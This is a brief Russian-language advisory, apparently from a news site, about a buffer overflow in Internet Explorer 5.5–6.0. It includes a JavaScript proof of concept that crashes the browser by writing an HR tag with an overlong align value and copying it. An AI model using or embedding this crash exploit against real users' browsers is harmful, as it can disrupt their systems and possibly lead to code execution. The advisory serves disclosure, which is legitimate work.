Переполнение буфера обнаружено в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу IE и возможно выполнить произвольный код на системе. 

Следующий код приведет к аварийному завершению работы IE: 

<script>
wnd=open("about:blank","",""); 
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+=»X»;
buffer+="DigitalScream";
WndDoc.write("<HR align=’"+buffer+"’>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>

Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0.



Оставить мнение